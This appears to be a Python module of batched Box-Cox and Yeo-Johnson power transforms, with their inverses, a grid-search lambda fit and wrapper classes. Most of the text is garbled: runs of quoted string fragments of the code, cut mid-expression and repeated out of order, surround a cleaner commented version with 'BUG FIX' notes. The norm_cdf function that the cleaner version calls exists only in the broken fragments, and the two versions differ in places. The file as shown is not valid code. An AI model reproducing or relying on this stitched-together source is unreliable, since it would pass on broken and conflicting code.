1)).astype(xp.float64)", "** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma): \"\"\"Normal", "= yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in, lam) ys = xp.sort(yp,", "tranform using the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper", "self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform", "- y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask)", "xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam", "y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] =", "ks_mask = ks < best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks,", "mu[:, None] y = 0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) #", "4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask])", "(y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask =", "return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a", "shapiro-wilk or 'normaltest' but we'd need a batched version y_in = xp.atleast_2d(y) batch_size", "def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in =", "@sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power transform", "= y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range),", "zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) **", "1d variables in y, store the lambdas for the inv transform.\"\"\" ks =", "pylint: disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp # 
TODO this could be better", "= xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None: lam2 = 1.0 - xp.min(y_in,", "lam2 is None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape)", "ret def inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_boxcox(y,", "/ lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask] =", "fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def inv(self, y):", "xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask]", "y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) &", "- y_in[(~pos_mask) & two_mask]) return ret, lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam):", "): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit the batched", "lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True)", "lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64)", "first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape)", "None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] = 1.0 return y", "ks < best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class", "lambda storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit the batched 1d variables", "lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask]", "None: # a = xp.ravel(a) # axis = 0 axis = y.ndim -", "we'd need a batched version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks =", "values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\"", 
@sync_numerical_libs
def yeojohnson(y, lam):
    """Yeo-Johnson transform, batched in the first dimension.

    Parameters
    ----------
    y : array
        Batched data; each row along the first axis is one variable.
    lam : array or scalar
        Transform parameter(s); broadcast to one lambda per batch row.

    Returns
    -------
    tuple
        (transformed array with ``y``'s shape, the per-row lambdas as a
        ``(batch, 1)`` column).
    """
    y_in = y.astype(xp.float64)
    # One lambda per batch row, shaped (batch, 1).
    lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)
    ret = xp.empty(y.shape)
    # Rows whose lambda rounds to 0 or 2 take the log branches below
    # (rounding to 4 places avoids float-equality misses).
    zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
    two_mask = xp.around(xp.ravel(lam1), 4) == 2.0
    pos_mask = y_in >= 0.0
    # Expand per-row masks and lambdas to full elementwise shape.
    zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape)
    two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape)
    lam1 = xp.broadcast_to(lam1, pos_mask.shape)
    # NB: write order matters — the lam==0 / lam==2 assignments overwrite the
    # general-case values (which divide by zero at those lambdas) in place.
    ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask]
    ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0)
    ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0)
    ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask])
    return ret, lam1[:, 0][..., None]
@sync_numerical_libs
def inv_yeojohnson(y, lam):
    """Inverse Yeo-Johnson transform, batched in the first dimension.

    Parameters
    ----------
    y : array
        Batched transformed data; each row along the first axis is one variable.
    lam : array or scalar
        The lambda(s) used by the forward transform; broadcast per batch row.

    Returns
    -------
    array
        The un-transformed data, same shape as ``y``.
    """
    y_in = y.astype(xp.float64)
    # One lambda per batch row, shaped (batch, 1).
    lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)
    ret = xp.empty(y.shape)
    # Rows whose lambda rounds to 0 or 2 take the exp branches below.
    zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
    two_mask = xp.around(xp.ravel(lam1), 4) == 2.0
    pos_mask = y_in >= 0.0
    # Expand per-row masks and lambdas to full elementwise shape.
    zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape)
    two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape)
    lam1 = xp.broadcast_to(lam1, pos_mask.shape)
    # NB: write order matters — the lam==0 / lam==2 assignments overwrite the
    # general-case values (which divide by zero at those lambdas) in place.
    ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0
    ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0
    ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0
    ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0
    return ret
@sync_numerical_libs
def boxcox(y, lam, lam2=None):
    """Box-Cox transform, batched in the first dimension.

    Parameters
    ----------
    y : array
        Batched data; each row along the first axis is one variable.
    lam : array or scalar
        Transform parameter(s); broadcast to one lambda per batch row.
    lam2 : array, optional
        Per-row shift; when ``None`` it is chosen as ``1 - min(row)`` so the
        shifted data is strictly positive.

    Returns
    -------
    tuple
        (transformed array, the ``(batch, 1)`` lambdas, the shifts used).
    """
    # TODO add an explicit axis parameter (currently fixed to the last axis)
    axis = y.ndim - 1
    data = y.astype(xp.float64)
    lam1 = xp.broadcast_to(lam, (data.shape[0], 1)).astype(xp.float64)
    if lam2 is None:
        lam2 = 1.0 - xp.min(data, axis=axis, keepdims=True)
    out = xp.empty(y.shape)
    # Rows whose lambda rounds to zero use the log form; all others the power form.
    log_rows = xp.around(xp.ravel(lam1), 4) == 0.0
    pow_rows = ~log_rows
    out[log_rows] = xp.log(data[log_rows] + lam2[log_rows])
    out[pow_rows] = ((data[pow_rows] + lam2[pow_rows]) ** lam1[pow_rows] - 1.0) / lam1[pow_rows]
    return out, lam1, lam2
@sync_numerical_libs
def inv_boxcox(y, lam1, lam2):
    """Inverse Box-Cox transform, batched in the first dimension.

    Parameters
    ----------
    y : array
        Batched transformed data.
    lam1 : array
        Per-row lambdas returned by :func:`boxcox`.
    lam2 : array
        Per-row shifts returned by :func:`boxcox`.

    Returns
    -------
    array
        The un-transformed data, same shape as ``y``.
    """
    data = y.astype(xp.float64)
    out = xp.empty(y.shape)
    # Rows whose lambda rounds to zero invert the log form; the rest invert the power form.
    log_rows = xp.around(xp.ravel(lam1), 4) == 0.0
    pow_rows = ~log_rows
    out[log_rows] = xp.exp(data[log_rows]) - lam2[log_rows]
    out[pow_rows] = (lam1[pow_rows] * data[pow_rows] + 1.0) ** (1.0 / lam1[pow_rows]) - lam2[pow_rows]
    return out
-xp.exp(-y_in[(~pos_mask) &", "if axis is None: # a = xp.ravel(a) # axis = 0 axis", "ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4)", "two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] *", "** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask)", "ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask]", "batched.\"\"\" t = x - mu[:, None] y = 0.5 * xp.special.erfc(-t /", "pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] -", "the batched 1d variables in y, store the lambdas for the inv transform.\"\"\"", "\"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam,", "y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class", "1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit", "ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) -", "search, taking the the most normally distributed result.\"\"\" # TODO currently this just", "Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam,", "1)).astype(xp.float64) if lam2 is None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret", "def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in", "= -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return ret @sync_numerical_libs def boxcox(y, lam, lam2=None):", "<filename>bucky/util/power_transforms.py \"\"\"Simple power transformation classes.\"\"\" # pylint: disable=unused-variable from ..numerical_libs import 
@sync_numerical_libs
def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)):
    """Fit lambda of a power transform using grid search, taking the most normally distributed result.

    Parameters
    ----------
    y : array
        1d variable or batch of variables (promoted to 2d internally).
    yj : bool
        Use the Yeo-Johnson transform instead of Box-Cox.
    lam_range : tuple
        ``(start, stop, step)`` grid of candidate lambdas, passed to ``arange``.

    Returns
    -------
    tuple
        (best KS statistic per row, best lambda per row).
    """
    # TODO currently this just minimizes the KS-stat; it would be better to use
    # shapiro-wilk or 'normaltest' but we'd need a batched version
    y_in = xp.atleast_2d(y)
    batch_size = y_in.shape[0]
    best_ks = xp.full(batch_size, xp.inf)
    best_ks_lam = xp.empty(batch_size)
    for lam in xp.around(xp.arange(*lam_range), 6):
        if yj:
            # BUG FIX: pass the 2d-promoted y_in; the original passed the raw
            # 1d y here, which broke broadcasting for 1d inputs and was
            # inconsistent with the boxcox branch below.
            yp, _ = yeojohnson(y_in, lam)
        else:
            yp, _, _ = boxcox(y_in, lam)
        ys = xp.sort(yp, axis=1)
        # NOTE(review): cumsum(sorted)/sum is not the usual empirical CDF
        # ((i+1)/n); kept as-is to preserve the existing lambda selection —
        # confirm whether this was intentional.
        cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True)
        # BUG FIX: norm_cdf expects a standard deviation; the variance was
        # being passed as sigma.
        ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.sqrt(xp.var(yp, axis=1)))), axis=1)
        ks_mask = ks < best_ks
        best_ks[ks_mask] = ks[ks_mask]
        best_ks_lam[ks_mask] = lam
    return (best_ks, best_ks_lam)
class BoxCox:
    """Stateful wrapper around the batched Box-Cox transform.

    Fits one lambda (and shift) per batch row and remembers them so the
    transform can be inverted later.
    """

    def __init__(self):
        """Initialize the (unfitted) lambda storage."""
        self.lam1 = None  # per-row lambdas, set by fit()
        self.lam2 = None  # per-row shifts, set by fit()

    def fit(self, y):
        """Fit the batched 1d variables in y, store the lambdas for the inv transform."""
        _, best_lam = fit_lam(y, yj=False)
        ret, self.lam1, self.lam2 = boxcox(y, best_lam[:, None])
        return ret

    def inv(self, y):
        """Inverse transform using the fitted lambda values."""
        return inv_boxcox(y, self.lam1, self.lam2)
class YeoJohnson:
    """Stateful wrapper around the batched Yeo-Johnson transform.

    Fits one lambda per batch row and remembers it so the transform can be
    inverted later.
    """

    def __init__(self):
        """Initialize the (unfitted) lambda storage."""
        self.lam1 = None  # per-row lambdas, set by fit()

    def fit(self, y):
        """Fit the batched 1d variables in y, store the lambdas for the inv transform."""
        _, best_lam = fit_lam(y, yj=True)
        ret, self.lam1 = yeojohnson(y, best_lam[:, None])
        return ret

    def inv(self, y):
        """Inverse transform using the fitted lambda values."""
        return inv_yeojohnson(y, self.lam1)
axis = y.ndim - 1 y_in =", "1.0 return ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the", "self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__( self,", "this could be better organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in", "= xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4) ==", "class for a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1", "self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit the", "= (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask", "xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1)", "would might better to used shapiro-wilk or 'normaltest' but we'd need a batched", "= ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] -", "axis = y.ndim - 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)", "0 axis = y.ndim - 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0],", "* xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] = 1.0 return y @sync_numerical_libs", "to used shapiro-wilk or 'normaltest' but we'd need a batched version y_in =", "= y.ndim - 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if", "ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for a", "y): \"\"\"Fit the batched 1d variables in y, store the lambdas for the", "pos_mask = y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:,", "(2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask) & two_mask] =", 
"ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask]", "def fit(self, y): \"\"\"Fit the batched 1d variables in y, store the lambdas", "+ 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x, mu,", "axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask", "\"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) ret =", "KS-stat, # would might better to used shapiro-wilk or 'normaltest' but we'd need", "tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0],", "xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] =", "def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None", "y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask =", "- 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) +", "lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\"", "zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask", "@sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\"", "y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4)", "None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask =", "for a Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 =", "xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] +", "((y_in[pos_mask] + 1.0) ** 
lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] =", "boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1,", "_, _ = boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1)", "ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret,", "power transformation classes.\"\"\" # pylint: disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp # TODO", "* y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret def", "- 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0)", "0.1)): \"\"\"Fit lambda of a power transform using grid search, taking the the", "lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y,", "= xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0", "= ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret, lam1,", "ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0", "** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y,", "ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask] = ((1.0 -", "a = xp.ravel(a) # axis = 0 axis = y.ndim - 1 y_in", "could be better organized... 
@sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the", "best_ks_lam) class BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def __init__( self, ):", "self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None def fit(self,", "transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return", "variables in y, store the lambdas for the inv transform.\"\"\" ks = fit_lam(y,", "def inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1,", "== 2.0 pos_mask = y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask", "batched version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam", "ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def", "/ lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox", "if lam2 is None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret =", "power transform using grid search, taking the the most normally distributed result.\"\"\" #", "= fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def inv(self,", "organized... 
@sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in", "0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask]", "inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__(", "\"\"\"Box-Cox tranform, batched in the first dimension.\"\"\" # TODO add axis param #", "yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power transform using grid search,", "YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda", "sync_numerical_libs, xp # TODO this could be better organized... @sync_numerical_libs def yeojohnson(y, lam):", "xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask])", "lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def", "lambda storage.\"\"\" self.lam1 = None self.lam2 = None def fit(self, y): \"\"\"Fit the", "first dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) ==", "xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask = ks < best_ks best_ks[ks_mask] = ks[ks_mask]", "\"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None def fit(self, y): \"\"\"Fit", "in y, store the lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=True)", "zero_mask] + 1.0) ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) -", "= xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask])", "\"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 =", "xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] +", "this just minimizes the 
KS-stat, # would might better to used shapiro-wilk or", "- mu[:, None] y = 0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0)))", "disable=no-member y[y > 1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2,", "== 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) **", "= xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask]", "< best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox:", "(lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask &", "y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask])", "t = x - mu[:, None] y = 0.5 * xp.special.erfc(-t / (sigma[:,", "ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse", "\"\"\"Fit lambda of a power transform using grid search, taking the the most", "fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power transform using grid", "ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the first dimension.\"\"\"", "1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask &", "- xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0", "yj: yp, _ = yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in, lam)", "a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None", "sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t = x - mu[:, None] y =", "cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys,", "= lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for a Box-Cox 
transformer.\"\"\"", "keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask]", "inv transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None])", "boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the first dimension.\"\"\" # TODO add", "= ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for", "- lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t", "** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask]", "1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of", "yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in, lam) ys = xp.sort(yp, axis=1)", "Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def", "+ 1.0 return ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in", "lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first", "BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda", "= None def fit(self, y): \"\"\"Fit the batched 1d variables in y, store", "class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init", "# TODO add axis param # if axis is None: # a =", ">= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1", "\"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\"", "batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam in", "ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return 
